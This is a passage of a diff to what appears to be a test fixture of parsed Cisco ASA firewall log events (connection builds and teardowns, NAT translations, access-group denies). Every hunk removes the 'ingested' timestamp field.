0:01:08 bytes 1715 TCP Reset-I", "code": "302014", "kind": "event", @@ -819,7 +810,6 @@ "severity": 6, "duration": 69000000000, "reason": "TCP Reset-I", - "ingested": "2021-12-29T09:58:07.009027016Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11731 for outside:192.168.35.9/80 to inside:172.31.98.44/1747 duration 0:01:09 bytes 45595 TCP Reset-I", "code": "302014", "kind": "event", @@ -904,7 +894,6 @@ "severity": 6, "duration": 69000000000, "reason": "TCP Reset-I", - "ingested": "2021-12-29T09:58:07.009028070Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11723 for outside:192.168.211.242/80 to inside:172.31.98.44/1742 duration 0:01:09 bytes 27359 TCP Reset-I", "code": "302014", "kind": "event", @@ -989,7 +978,6 @@ "severity": 6, "duration": 69000000000, "reason": "TCP Reset-I", - "ingested": "2021-12-29T09:58:07.009029207Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11715 for outside:192.168.218.21/80 to inside:172.31.98.44/1741 duration 0:01:09 bytes 4457 TCP Reset-I", "code": "302014", "kind": "event", @@ -1074,7 +1062,6 @@ "severity": 6, "duration": 69000000000, "reason": "TCP Reset-I", - "ingested": "2021-12-29T09:58:07.009030232Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11711 for outside:192.168.198.27/80 to inside:172.31.98.44/1739 duration 0:01:09 bytes 26709 TCP Reset-I", "code": "302014", "kind": "event", @@ -1159,7 +1146,6 @@ "severity": 6, "duration": 69000000000, "reason": "TCP Reset-I", - "ingested": "2021-12-29T09:58:07.009031202Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11712 for outside:192.168.198.27/80 to inside:172.31.98.44/1740 duration 0:01:09 bytes 22097 TCP Reset-I", "code": "302014", "kind": "event", @@ -1244,7 +1230,6 @@ "severity": 6, "duration": 70000000000, "reason": "TCP Reset-I", - "ingested": "2021-12-29T09:58:07.009032196Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11708 for outside:192.168.202.211/80 to inside:172.31.98.44/1738 duration 0:01:10 bytes 2209 TCP Reset-I", "code": "302014", "kind": "event", @@ -1329,7 +1314,6 @@ "severity": 6, "duration": 67000000000, "reason": "TCP Reset-I", - "ingested": "2021-12-29T09:58:07.009033247Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11746 for outside:192.168.124.15/80 to inside:172.31.98.44/1756 duration 0:01:07 bytes 10404 TCP Reset-I", "code": "302014", "kind": "event", @@ -1414,7 +1398,6 @@ "severity": 6, "duration": 70000000000, "reason": "TCP Reset-I", - "ingested": "2021-12-29T09:58:07.009034512Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11706 for outside:192.168.124.15/80 to inside:172.31.98.44/1737 duration 0:01:10 bytes 123694 TCP Reset-I", "code": "302014", "kind": "event", @@ -1499,7 +1482,6 @@ "severity": 6, "duration": 71000000000, "reason": "TCP Reset-I", - "ingested": "2021-12-29T09:58:07.009035483Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11702 for outside:192.168.209.247/80 to inside:172.31.98.44/1736 duration 0:01:11 bytes 35835 TCP Reset-I", "code": "302014", "kind": "event", @@ -1584,7 +1566,6 @@ "severity": 6, "duration": 30000000000, "reason": "SYN Timeout", - "ingested": "2021-12-29T09:58:07.009036476Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11753 for outside:192.168.35.162/80 to inside:172.31.98.44/1765 duration 0:00:30 bytes 0 SYN Timeout", "code": "302014", "kind": "event", @@ -1666,7 +1647,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009037451Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic UDP translation from inside:172.31.98.44/56132 to outside:192.168.98.44/1188", "code": "305011", "kind": "event", @@ -1745,7 +1725,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009038507Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11758 for outside:192.168.80.32/53 (192.168.80.32/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -1830,7 +1809,6 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-29T09:58:07.009039481Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11758 for outside:192.168.80.32/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 148", "code": "302016", "kind": "event", @@ -1913,7 +1891,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009040459Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11759 for outside:192.168.252.6/53 (192.168.252.6/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -1998,7 +1975,6 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-29T09:58:07.009041551Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11759 for outside:192.168.252.6/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 164", "code": "302016", "kind": "event", @@ -2080,7 +2056,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009042527Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1773 to outside:192.168.98.44/8257", "code": "305011", "kind": "event", @@ -2159,7 +2134,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009043519Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11760 for outside:192.168.252.226/80 (192.168.252.226/80) to inside:172.31.98.44/1773 (172.31.98.44/1773)", "code": "302013", "kind": "event", @@ -2242,7 +2216,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009044494Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1774 to outside:192.168.98.44/8258", "code": "305011", "kind": "event", @@ -2321,7 +2294,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009045477Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11761 for outside:192.168.252.226/80 (192.168.252.226/80) to inside:172.31.98.44/1774 (172.31.98.44/1774)", "code": "302013", "kind": "event", @@ -2405,7 +2377,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009046461Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11762 for outside:192.168.238.126/53 (192.168.238.126/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -2489,7 +2460,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009047423Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11763 for outside:192.168.93.51/53 (192.168.93.51/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -2574,7 +2544,6 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-29T09:58:07.009048392Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11762 for outside:192.168.238.126/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 111", "code": "302016", "kind": "event", @@ -2658,7 +2627,6 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-29T09:58:07.009049458Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11763 for outside:192.168.93.51/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 237", "code": "302016", "kind": "event", @@ -2740,7 +2708,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009050435Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1775 to outside:192.168.98.44/8259", "code": "305011", "kind": "event", @@ -2819,7 +2786,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009051420Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11764 for outside:192.168.225.103/443 (192.168.225.103/443) to inside:172.31.98.44/1775 (172.31.98.44/1775)", "code": "302013", "kind": "event", @@ -2902,7 +2868,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009052526Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic UDP translation from inside:172.31.98.44/56132 to outside:192.168.98.44/1189", "code": "305011", "kind": "event", @@ -2981,7 +2946,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009053508Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11772 for outside:192.168.240.126/53 (192.168.240.126/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -3065,7 +3029,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009054578Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11773 for outside:192.168.44.45/53 (192.168.44.45/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -3150,7 +3113,6 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-29T09:58:07.009055570Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11772 for outside:192.168.240.126/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 87", "code": "302016", "kind": "event", @@ -3234,7 +3196,6 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-29T09:58:07.009056550Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11773 for outside:192.168.44.45/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 221", "code": "302016", "kind": "event", @@ -3316,7 +3277,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009057513Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1452 to outside:192.168.98.44/8265", "code": "305011", "kind": "event", @@ -3395,7 +3355,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009058483Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11774 for outside:192.168.179.219/80 (192.168.179.219/80) to inside:172.31.98.44/1452 (172.31.98.44/1452)", "code": "302013", "kind": "event", @@ -3479,7 +3438,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009059527Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11775 for outside:192.168.157.232/53 (192.168.157.232/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -3563,7 +3521,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009060511Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11776 for outside:192.168.178.133/53 (192.168.178.133/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -3648,7 +3605,6 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-29T09:58:07.009061485Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11775 for outside:192.168.157.232/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 101", "code": "302016", "kind": "event", @@ -3732,7 +3688,6 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-29T09:58:07.009062465Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11776 for outside:192.168.178.133/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 126", "code": "302016", "kind": "event", @@ -3814,7 +3769,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009063436Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1453 to outside:192.168.98.44/8266", "code": "305011", "kind": "event", @@ -3893,7 +3847,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009064548Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11777 for outside:192.168.133.112/80 (192.168.133.112/80) to inside:172.31.98.44/1453 (172.31.98.44/1453)", "code": "302013", "kind": "event", @@ -3979,7 +3932,6 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-29T09:58:07.009065569Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11777 for outside:192.168.133.112/80 to inside:172.31.98.44/1453 duration 0:00:00 bytes 862 TCP FINs", "code": "302014", "kind": "event", @@ -4062,7 +4014,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009066538Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11779 for outside:192.168.204.197/53 (192.168.204.197/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -4147,7 +4098,6 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-29T09:58:07.009067533Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11778 for outside:192.168.157.232/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104", "code": "302016", "kind": "event", @@ -4231,7 +4181,6 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-29T09:58:07.009068673Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11779 for outside:192.168.204.197/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 176", "code": "302016", "kind": "event", @@ -4313,7 +4262,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009069659Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1454 to outside:192.168.98.44/8267", "code": "305011", "kind": "event", @@ -4392,7 +4340,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009070626Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11780 for outside:192.168.128.3/80 (192.168.128.3/80) to inside:172.31.98.44/1454 (172.31.98.44/1454)", "code": "302013", "kind": "event", @@ -4475,7 +4422,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009071614Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1455 to outside:192.168.98.44/8268", "code": "305011", "kind": "event", @@ -4554,7 +4500,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009072578Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11781 for outside:192.168.128.3/80 (192.168.128.3/80) to inside:172.31.98.44/1455 (172.31.98.44/1455)", "code": "302013", "kind": "event", @@ -4637,7 +4582,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009073575Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1456 to outside:192.168.98.44/8269", "code": "305011", "kind": "event", @@ -4716,7 +4660,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009074622Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11782 for outside:192.168.128.3/80 (192.168.128.3/80) to inside:172.31.98.44/1456 (172.31.98.44/1456)", "code": "302013", "kind": "event", @@ -4800,7 +4743,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009075624Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11783 for outside:192.168.100.4/53 (192.168.100.4/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -4885,7 +4827,6 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-29T09:58:07.009076598Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11783 for outside:192.168.100.4/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104", "code": "302016", "kind": "event", @@ -4967,7 +4908,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009077581Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1457 to outside:192.168.98.44/8270", "code": "305011", "kind": "event", @@ -5046,7 +4986,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009078559Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11784 for outside:192.168.198.40/80 (192.168.198.40/80) to inside:172.31.98.44/1457 (172.31.98.44/1457)", "code": "302013", "kind": "event", @@ -5129,7 +5068,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009079576Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1458 to outside:192.168.98.44/8271", "code": "305011", "kind": "event", @@ -5208,7 +5146,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009080663Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11785 for outside:192.168.198.40/80 (192.168.198.40/80) to inside:172.31.98.44/1458 (172.31.98.44/1458)", "code": "302013", "kind": "event", @@ -5292,7 +5229,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009081639Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11786 for outside:192.168.1.107/53 (192.168.1.107/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -5378,7 +5314,6 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-29T09:58:07.009082604Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11784 for outside:192.168.198.40/80 to inside:172.31.98.44/1457 duration 0:00:00 bytes 593 TCP FINs", "code": "302014", "kind": "event", @@ -5460,7 +5395,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009083577Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1459 to outside:192.168.98.44/8272", "code": "305011", "kind": "event", @@ -5539,7 +5473,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009084558Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11787 for outside:192.168.198.40/80 (192.168.198.40/80) to inside:172.31.98.44/1459 (172.31.98.44/1459)", "code": "302013", "kind": "event", @@ -5624,7 +5557,6 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-29T09:58:07.009085625Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11786 for outside:192.168.1.107/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 375", "code": "302016", "kind": "event", @@ -5706,7 +5638,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009086610Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1460 to outside:192.168.98.44/8273", "code": "305011", "kind": "event", @@ -5785,7 +5716,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009087589Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11788 for outside:192.168.192.44/80 (192.168.192.44/80) to inside:172.31.98.44/1460 (172.31.98.44/1460)", "code": "302013", "kind": "event", @@ -5837,7 +5767,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009088559Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1454 to outside:192.168.98.44/8267 duration 0:00:30", "code": "305012", "kind": "event", @@ -5915,7 +5844,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009089535Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.156.80/1385 to outside:192.168.98.44/8277", "code": "305011", "kind": "event", @@ -5994,7 +5922,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009090519Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11797 for outside:192.168.19.254/80 (192.168.19.254/80) to inside:172.31.156.80/1385 (172.31.156.80/1385)", "code": "302013", "kind": "event", @@ -6046,7 +5973,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009091525Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1455 to outside:192.168.98.44/8268 duration 0:00:30", "code": "305012", "kind": "event", @@ -6093,7 +6019,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009092661Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1456 to outside:192.168.98.44/8269 duration 0:00:30", "code": "305012", "kind": "event", @@ -6140,7 +6065,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009093639Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1457 to outside:192.168.98.44/8270 duration 0:00:30", "code": "305012", "kind": "event", @@ -6187,7 +6111,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009094610Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1458 to outside:192.168.98.44/8271 duration 0:00:30", "code": "305012", "kind": "event", @@ -6234,7 +6157,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009096060Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1459 to outside:192.168.98.44/8272 duration 0:00:30", "code": "305012", "kind": "event", @@ -6281,7 +6203,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009097056Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1460 to outside:192.168.98.44/8273 duration 0:00:30", "code": "305012", "kind": "event", @@ -6362,7 +6283,6 @@ "severity": 6, "duration": 325000000000, "reason": "TCP FINs", - "ingested": "2021-12-29T09:58:07.009098043Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11564 for outside:192.168.115.46/80 to inside:172.31.156.80/1382 duration 0:05:25 bytes 575 TCP FINs", "code": "302014", "kind": "event", @@ -6447,7 +6367,6 @@ "severity": 6, "duration": 0, "reason": "TCP Reset-I", - "ingested": "2021-12-29T09:58:07.009099010Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11797 for outside:192.168.19.254/80 to inside:172.31.156.80/1385 duration 0:00:00 bytes 5391 TCP Reset-I", "code": "302014", "kind": "event", @@ -6529,7 +6448,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009099984Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.156.80/1386 to outside:192.168.98.44/8278", "code": "305011", "kind": "event", @@ -6608,7 +6526,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009100996Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11798 for outside:192.168.115.46/80 (192.168.115.46/80) to inside:172.31.156.80/1386 (172.31.156.80/1386)", "code": "302013", "kind": "event", @@ -6691,7 +6608,6 @@ }, "event": { "severity": 4, - "ingested": "2021-12-29T09:58:07.009102026Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -6772,7 +6688,6 @@ }, "event": { "severity": 4, - "ingested": "2021-12-29T09:58:07.009103006Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -6853,7 +6768,6 @@ }, "event": { "severity": 4, - "ingested": "2021-12-29T09:58:07.009103976Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -6934,7 +6848,6 @@ }, "event": { "severity": 4, - "ingested": "2021-12-29T09:58:07.009104938Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -7015,7 +6928,6 @@ }, "event": { "severity": 4, - "ingested": "2021-12-29T09:58:07.009147317Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -7096,7 +7008,6 @@ }, "event": { "severity": 4, - "ingested": "2021-12-29T09:58:07.009148859Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -7177,7 +7088,6 @@ }, "event": { "severity": 4, - "ingested": "2021-12-29T09:58:07.009149844Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -7258,7 +7168,6 @@ }, "event": { "severity": 4, - "ingested": "2021-12-29T09:58:07.009150824Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -7339,7 +7248,6 @@ }, "event": { "severity": 4, - "ingested": "2021-12-29T09:58:07.009151810Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -7420,7 +7328,6 @@ }, "event": { "severity": 4, - "ingested": "2021-12-29T09:58:07.009152798Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -7501,7 +7408,6 @@ }, "event": { "severity": 4, - "ingested": "2021-12-29T09:58:07.009153854Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -7582,7 +7488,6 @@ }, "event": { "severity": 4, - "ingested": "2021-12-29T09:58:07.009154877Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst 